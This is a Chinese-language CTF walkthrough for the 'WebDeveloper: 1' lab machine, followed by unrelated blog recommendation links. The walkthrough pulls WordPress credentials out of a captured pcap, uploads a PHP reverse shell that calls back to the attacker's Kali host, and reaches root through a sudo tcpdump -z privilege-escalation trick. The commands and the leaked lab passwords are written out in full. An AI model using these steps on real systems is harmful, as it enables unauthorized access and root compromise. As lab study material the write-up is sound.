WebDeveloper:1靶机

端口扫描

靶机ip地址为192.168.153.158

目录扫描

访问80端口

拼接访问 /ipdata 发现了一个流量包

放在 wireshark 查看,找到 账号密码

账号:webdeveloper

密码:Te5eQg&4sBS!Yr$)wf%(DcAd

拼接 /wp-login.php

找到登录框

登录成功

找到后台文件上传功能点

利用kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

将ip地址改成kali的ip

上传文件

上传的文件在wp-content/uploads/目录下

kali监听

反弹成功

获得交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

/var/www/html/目录下 ,查看 wp-config.php 文件

得到数据库账号密码

账号:webdeveloper

密码:MasterOfTheUniverse

ssh连接 ssh webdeveloper@192.168.153.158

连接成功

sudo提权 sudo -l

找到 php-reverse-shell.php文件位置

COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

反弹成功

为root权限

相关推荐
谢白羽2 分钟前
vllm实践
android·vllm
电子云与长程纠缠44 分钟前
Godot学习03 - 实例化、层级访问、Export
android·学习·godot
weiwx831 小时前
Nginx location 和 proxy_pass 配置详解
服务器·网络·nginx
毕设源码-朱学姐1 小时前
【开题答辩全过程】以 基于Android的便民系统的设计与实现为例,包含答辩的问题和答案
android
鬼蛟1 小时前
Spring————事务
android·java·spring
qq_170264753 小时前
unity出安卓年龄分级的arr包问题
android·unity·游戏引擎
互成4 小时前
加密系统哪款最好用?2026年五款加密系统深度对比测评
运维·网络·安全
mftang4 小时前
WebSocket 通信协议详细解析
网络·websocket·网络协议
野指针YZZ4 小时前
TCP包 wireshark抓包分析-RK3588
网络·tcp/ip·wireshark
kejiashao4 小时前
Android View的绘制流程及事件分发机制
android